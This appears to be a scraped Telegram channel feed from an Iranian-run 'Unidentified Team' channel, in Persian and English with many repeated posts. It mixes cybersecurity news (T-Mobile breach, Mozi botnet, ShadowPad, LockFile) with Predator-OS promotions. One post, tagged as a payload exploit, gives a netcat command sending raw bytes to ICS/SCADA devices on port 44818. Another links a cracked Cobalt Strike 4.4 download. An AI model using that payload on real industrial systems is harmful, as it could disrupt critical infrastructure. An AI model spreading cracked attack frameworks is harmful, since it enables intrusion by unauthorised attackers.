اپراتور T-Mobile هک اطلاعات محرمانه ۴۷ میلیون مشترک خود را تایید کرد
اپراتور T-Mobile اعلام کرده است که تحقیقات داخلی پیرامون حادثه اخیر هنوز در جریان است، اما افشای اطلاعات ۴۷.۸ میلیون کاربر از سوی این شرکت تایید شده است. طبق آخرین گزارشهای رسمی مالی منتشر شده، اپراتور گفته شده دارای بیش از ۱۰۴ میلیون مشترک است.
@UNIDENTIFIED_TM
#news
اپراتور T-Mobile اعلام کرده است که تحقیقات داخلی پیرامون حادثه اخیر هنوز در جریان است، اما افشای اطلاعات ۴۷.۸ میلیون کاربر از سوی این شرکت تایید شده است. طبق آخرین گزارشهای رسمی مالی منتشر شده، اپراتور گفته شده دارای بیش از ۱۰۴ میلیون مشترک است.
@UNIDENTIFIED_TM
#news
یک پلت فرم بد افزار مدولار با نام ShadowPad که به صورت خصوصی فروخته می شود ، مورد علاقه گروه های جاسوسی سایبری چین قرار گرفته است.
این بک دور اصلی بود که در کمپین های جاسوسی متعدد از جمله حملات CCleaner ، NetSarang و ASUS Supply-Chain استفاده می شد.
@UNIDENTIFIED_TM
این بک دور اصلی بود که در کمپین های جاسوسی متعدد از جمله حملات CCleaner ، NetSarang و ASUS Supply-Chain استفاده می شد.
@UNIDENTIFIED_TM
بر اساس یافته های جدید ، Mozi ، یک بات نت همتا به همتا (P2P) که هدف آن دستگاه های اینترنت اشیا است ، قابلیت های جدیدی را به دست آورده است که به آن اجازه می دهد تا در دروازه های شبکه تولید شده توسط Netgear ، Huawei و ZTE به ماندگاری برسد.
محققان مرکز امنیت تهدیدات امنیتی مایکروسافت و بخش 52 در Azure Defender برای IoT در مقاله ای فنی گفتند: "با آلوده کردن روترها ، آنها می توانند حملات man-in-the-middle (MITM)-از طریق ربودن HTTP و جعل DNS-برای به خطر انداختن نقاط پایانی و استقرار باج افزار یا ایجاد حوادث ایمنی در امکانات OT انجام دهند.”
@UNIDENTIFIED_TM
#news
محققان مرکز امنیت تهدیدات امنیتی مایکروسافت و بخش 52 در Azure Defender برای IoT در مقاله ای فنی گفتند: "با آلوده کردن روترها ، آنها می توانند حملات man-in-the-middle (MITM)-از طریق ربودن HTTP و جعل DNS-برای به خطر انداختن نقاط پایانی و استقرار باج افزار یا ایجاد حوادث ایمنی در امکانات OT انجام دهند.”
@UNIDENTIFIED_TM
#news
Unidentified T E A M
بر اساس یافته های جدید ، Mozi ، یک بات نت همتا به همتا (P2P) که هدف آن دستگاه های اینترنت اشیا است ، قابلیت های جدیدی را به دست آورده است که به آن اجازه می دهد تا در دروازه های شبکه تولید شده توسط Netgear ، Huawei و ZTE به ماندگاری برسد. محققان مرکز امنیت…
According to new findings, Mozi, a peer-to-peer (P2P) botnet targeting IoT devices, has acquired new capabilities that allow it to access the network gateways produced by Netgear. Huawei and ZTE reach longevity.
"By infecting routers, they can launch man-in-the-middle (MITM) attacks - by hijacking HTTP and forging DNS - "Endanger endpoints and install ransomware or create security incidents in OT facilities."
@UNIDENTIFIED_TM
#news
"By infecting routers, they can launch man-in-the-middle (MITM) attacks - by hijacking HTTP and forging DNS - "Endanger endpoints and install ransomware or create security incidents in OT facilities."
@UNIDENTIFIED_TM
#news
Forwarded from Predator-OS
Media is too big
VIEW IN TELEGRAM
The Tutorial mode in Linux predator-os includes many offline tutorials which will be available to beginners and academy users through this menu.
In this mode, many training files, such as:
*.overview on security
*.Security checklists
*.Cheat sheets. A variety of cheat sheets from Linux, security, hacking, programming languages, etc.
*.Linux shortcut key
*.Quick tutorial and Linux tutorial
*.Quick security training and security tutorial
All the above files are available through the menu in pdf format.
==========
مد آموزشی در لینوکس predator-os شامل آموزشهای زیادی به صورت آفلاین که از طریق این منو برای کاربران تازه کار و آکادمی در دسترس خواهد بود.
در این مد فایل های آموزشی زیادی ازجمله:
معرفی امنیت
چک لیست های امنیتی
برگ های تقلب cheat sheet
کلید میانبرهای لینوکس
آموزش سریع و خود آموز لینوکس
آموزش سریع امنیت
contact us:
www.predator-os.com
https://t.me/joinchat/QPMh3Khn9izpmzqf
https://t.me/predator_os
info.predator.os@gmail.com
https://github.com/hosseinseilani
https://www.instagram.com/predator.os
In this mode, many training files, such as:
*.overview on security
*.Security checklists
*.Cheat sheets. A variety of cheat sheets from Linux, security, hacking, programming languages, etc.
*.Linux shortcut key
*.Quick tutorial and Linux tutorial
*.Quick security training and security tutorial
All the above files are available through the menu in pdf format.
==========
مد آموزشی در لینوکس predator-os شامل آموزشهای زیادی به صورت آفلاین که از طریق این منو برای کاربران تازه کار و آکادمی در دسترس خواهد بود.
در این مد فایل های آموزشی زیادی ازجمله:
معرفی امنیت
چک لیست های امنیتی
برگ های تقلب cheat sheet
کلید میانبرهای لینوکس
آموزش سریع و خود آموز لینوکس
آموزش سریع امنیت
contact us:
www.predator-os.com
https://t.me/joinchat/QPMh3Khn9izpmzqf
https://t.me/predator_os
info.predator.os@gmail.com
https://github.com/hosseinseilani
https://www.instagram.com/predator.os
دستور اکسپلویت کردن آسیب پذیری برخی دیوایس های ICS و SCADA روی پورت 44818/TCP
@UNIDENTIFIED_TM
#payload_exploit
echo -e ”\x00\x00\xE8\xFF\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00”
| nc -w 2 <target_IP> 44818 > /dev/null
@UNIDENTIFIED_TM
#payload_exploit
Unidentified T E A M
@UNIDENTIFIED_TM
امنیت سایبری در تاسیسات هسته ای :
لایه های امنیتی در تاسیسات هسته ای به شدت زیاد هستند و دیتاسرور و لایه IT تحت حفاظت DMZ قرار دارند.
ارتباط هر لایه با لایه دیگر قطع میشود، سیستم ها از شبکه نیز جدا هستند و تمام برنامه ها در محیط سندباکس باز میشوند.
2 فایروال در لایه IT قبل از PLC و SCADA وجود دارد.
سیستمی به اسم SCRAM با افزایش دما یا فشار و تغییرات غیرمنتظره راکتور هسته ای را خاموش میکند. تمام اینها باعث برقراری امنیت زیاد و شکست خوردن بسیاری از حملات قبل از رسیدن به مراحل خطرناک می شود.
اما این امنیت بالا فقط در تاسیسات هسته ای صدق میکند، سیستم های کنترل صنعتی در مهم ترین زیرساخت های هر کشوری وجود دارند و تمام منابع و آب،گاز،نفت،برق و ... توسط این سیستم ها کنترل میشود که خیلی از آنها به اینترنت نیز وصل هستند و قابل نفوذ می باشند.
@UNIDENTIFIED_TM
#scada
#ics
#unidentified_security_team
لایه های امنیتی در تاسیسات هسته ای به شدت زیاد هستند و دیتاسرور و لایه IT تحت حفاظت DMZ قرار دارند.
ارتباط هر لایه با لایه دیگر قطع میشود، سیستم ها از شبکه نیز جدا هستند و تمام برنامه ها در محیط سندباکس باز میشوند.
2 فایروال در لایه IT قبل از PLC و SCADA وجود دارد.
سیستمی به اسم SCRAM با افزایش دما یا فشار و تغییرات غیرمنتظره راکتور هسته ای را خاموش میکند. تمام اینها باعث برقراری امنیت زیاد و شکست خوردن بسیاری از حملات قبل از رسیدن به مراحل خطرناک می شود.
اما این امنیت بالا فقط در تاسیسات هسته ای صدق میکند، سیستم های کنترل صنعتی در مهم ترین زیرساخت های هر کشوری وجود دارند و تمام منابع و آب،گاز،نفت،برق و ... توسط این سیستم ها کنترل میشود که خیلی از آنها به اینترنت نیز وصل هستند و قابل نفوذ می باشند.
@UNIDENTIFIED_TM
#scada
#ics
#unidentified_security_team
Unidentified T E A M
@UNIDENTIFIED_TM
Cyber security in nuclear facilities:
The security layers in nuclear installations are extremely high and the data server and IT layer are under DMZ protection.
Each layer is disconnected from the other, systems are disconnected from the network, and all applications open in the sandbox environment.
There are 2 firewalls in the IT layer before PLC and SCADA.
A system called SCRAM shuts down the nuclear reactor by increasing temperature or pressure and unexpected changes. All this leads to high security and the failure of many attacks before reaching dangerous stages.
But this high security applies only to nuclear facilities, industrial control systems exist in the most important infrastructure of any country, and all resources and water, gas, oil, electricity, etc. are controlled by these systems, many of which They are also connected to the Internet and are vulnerable.
@UNIDENTIFIED_TM
#scada
#ics
#unidentified_security_team
The security layers in nuclear installations are extremely high and the data server and IT layer are under DMZ protection.
Each layer is disconnected from the other, systems are disconnected from the network, and all applications open in the sandbox environment.
There are 2 firewalls in the IT layer before PLC and SCADA.
A system called SCRAM shuts down the nuclear reactor by increasing temperature or pressure and unexpected changes. All this leads to high security and the failure of many attacks before reaching dangerous stages.
But this high security applies only to nuclear facilities, industrial control systems exist in the most important infrastructure of any country, and all resources and water, gas, oil, electricity, etc. are controlled by these systems, many of which They are also connected to the Internet and are vulnerable.
@UNIDENTIFIED_TM
#scada
#ics
#unidentified_security_team
خانواده باج افزار جدید LockFile که ماه گذشته منتشر شد از یک تکنیک جدید موسوم به ""intermittent encryption" برای بک دور حفاظت از باج افزارهای رفتاری و مبتنی بر آمار استفاده می کند.
@UNIDENTIFIED_TM
@UNIDENTIFIED_TM
Forwarded from Predator-OS
Media is too big
VIEW IN TELEGRAM
موتور جستجوهای امنیتی در توزیع predator-os
========================
موتورهای جستجو امنیتی همچنین می توانند ابزارهای ارزشمندی برای تحلیلگران ، محققان امنیتی و دیگران باشند. این ابزارها می توانند به متخصصان امنیتی در یافتن تهدیدهای ردیابی ، دستگاه های در معرض دید ، آماده سازی برای شبیه سازی فیشینگ نیزه و موارد دیگر کمک کنند.
توزیع predator-os دارای موتورجستجوهای امنیتی است که اغلب توسط متخصصان امنیتی ، هکرها و کسانی که مایل به انجام جستجوی عمیق تر مانند Google و دیگر موتورهای جستجوی تجاری هستند استفاده می شود.
====================
Search engines used by security professionals, are valuable tools for both red teams and blue teams, as well as security researchers, analysts, and others. These tools can help in finding exposed devices, tracking threats, preparing for spear phishing simulations, and much, much more in the area of security operations
contact us:
www.predator-os.com
https://t.me/joinchat/QPMh3Khn9izpmzqf
info.predator.os@gmail.com
https://github.com/hosseinseilani
https://www.instagram.com/predator.os
========================
موتورهای جستجو امنیتی همچنین می توانند ابزارهای ارزشمندی برای تحلیلگران ، محققان امنیتی و دیگران باشند. این ابزارها می توانند به متخصصان امنیتی در یافتن تهدیدهای ردیابی ، دستگاه های در معرض دید ، آماده سازی برای شبیه سازی فیشینگ نیزه و موارد دیگر کمک کنند.
توزیع predator-os دارای موتورجستجوهای امنیتی است که اغلب توسط متخصصان امنیتی ، هکرها و کسانی که مایل به انجام جستجوی عمیق تر مانند Google و دیگر موتورهای جستجوی تجاری هستند استفاده می شود.
====================
Search engines used by security professionals, are valuable tools for both red teams and blue teams, as well as security researchers, analysts, and others. These tools can help in finding exposed devices, tracking threats, preparing for spear phishing simulations, and much, much more in the area of security operations
contact us:
www.predator-os.com
https://t.me/joinchat/QPMh3Khn9izpmzqf
info.predator.os@gmail.com
https://github.com/hosseinseilani
https://www.instagram.com/predator.os
Unidentified T E A M
بر اساس یافته های جدید ، Mozi ، یک بات نت همتا به همتا (P2P) که هدف آن دستگاه های اینترنت اشیا است ، قابلیت های جدیدی را به دست آورده است که به آن اجازه می دهد تا در دروازه های شبکه تولید شده توسط Netgear ، Huawei و ZTE به ماندگاری برسد. محققان مرکز امنیت…
Chinese law enforcement authorities have arrested cybercriminals behind the Mozi IoT botnet, nearly two years after the malware first appeared on the threat landscape.
@UNIDENTIFIED_TM
Read details: https://thehackernews.com/2021/09/chinese-authorities-arrest-hackers.html
@UNIDENTIFIED_TM
Read details: https://thehackernews.com/2021/09/chinese-authorities-arrest-hackers.html
Cobalt Strike 4.4
Cracked version.
Link: https://anonfiles.com/v7Ha1aF1uf/CobaltStrike4.4_GhostSec_7z
What is cobalt strike?
Cobalt Strike is threat emulation software. Execute targeted attacks against modern enterprises with one of the most powerful network attack kits available to penetration testers.
Providing features from Recon to post exploitation and much more
@UNIDENTIFIED_TM
Cracked version.
Link: https://anonfiles.com/v7Ha1aF1uf/CobaltStrike4.4_GhostSec_7z
What is cobalt strike?
Cobalt Strike is threat emulation software. Execute targeted attacks against modern enterprises with one of the most powerful network attack kits available to penetration testers.
Providing features from Recon to post exploitation and much more
@UNIDENTIFIED_TM
پروتون میل دیگر سرویس امنی برای هکرها نیست
برخلاف شعار no-log شرکت پروتون میل، این سرویس دهنده ایمیل قرار است از این به بعد IP و جزییات حسابهایی که از آنها شکایت شده و تحت پیگرد قرار میگیرند به مراجع قانونی تحویل دهد.
https://thehackernews.com/2021/09/protonmail-shares-activists-ip-address.html
#protonmail
#privacy
#news
منبع
#sec nerd
@Unidentified_TM
برخلاف شعار no-log شرکت پروتون میل، این سرویس دهنده ایمیل قرار است از این به بعد IP و جزییات حسابهایی که از آنها شکایت شده و تحت پیگرد قرار میگیرند به مراجع قانونی تحویل دهد.
https://thehackernews.com/2021/09/protonmail-shares-activists-ip-address.html
#protonmail
#privacy
#news
منبع
#sec nerd
@Unidentified_TM